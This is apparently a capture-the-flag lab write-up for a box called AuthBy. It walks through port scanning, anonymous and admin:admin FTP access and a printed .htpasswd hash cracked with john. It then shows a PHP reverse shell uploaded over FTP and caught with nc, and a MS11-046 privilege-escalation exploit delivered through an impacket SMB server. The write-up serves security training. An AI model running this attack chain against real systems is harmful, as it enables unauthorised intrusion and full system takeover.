# AuthBy
## nmap
```
mkdir nmap
sudo rustscan -a 192.168.118.46 --ulimit 5000 -- -A -oA nmap/all-ports-service-scan
```
Open ports on 21 and 242
## Enumeration
Visiting the HTTP Server on port 242 requires Basic Authentication
On FTP, logging in as **anonymous** seems to work.
I tried downloading the files but it seems I don't have read permission.
Looking at the directories, there's a folder called **accounts**
If I have to guess, these files are the **usernames** allowed to access this server.
Let's try to log in using `admin` as the username and password. And looks like there are 3 interesting files in this user account.
First, let's download all of these files on our local machine.
```
wget -r ftp://admin:admin@target-ip-address/
```
One of the files in there is called `.htpasswd` and it contains a username and the password hashed.
```
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```
Let's cracked this using `john`
We can also upload to the FTP server. I'm guessing, this means the FTP directory is where the website is hosted in. We can leverage this by uploading a PHP reverse shell via FTP and triggering it by vising the page using the credential we have cracked using `john`.
## Exploitation
Create a PHP reverse shell. But on this demo, I will use this [one](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php). Copy the source code and put that in your machine. I named it to `php-rev.php`
Edit the IP Address and the port at the bottom of the script. Set the port to 242.
Set up a reverse shell listener on port 242
```
sudo nc -lvnp 242
```
Upload the shell via FTP
Open your browser, and trigger the exploit. Log in using the credentials we have found above.
```
http://targett-ip:242/php-rev.php
```
After that, you should receive your shell right away.
## Privilege Escalation
Since winPEAS is not working somehow. I tried to search for privilege escalation exploits using [**WES-NG**](https://github.com/bitsadmin/wesng).
First, copy the output of `systeminfo` to our local machine.
Then execute the following to get the possible privilege escalation exploits.
```
sudo python3 wes.py systeminfo.txt -i "Elevation of Privilege"
```
After some time, I found this looking good exploit.
I have found a pre-compiled executable of this exploit [here](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS11-046/ms11-046.exe). Download a copy to your local machine.
Open an SMB Server to your machine.
```
sudo python /opt/impacket/examples/smbserver.py kali . -smb2support
```
Transfer the privilege escalation exploit.
After running the exploit, you should instantly get a **SYSTEM** shell.
Thanks and enjoy the rest of your day!
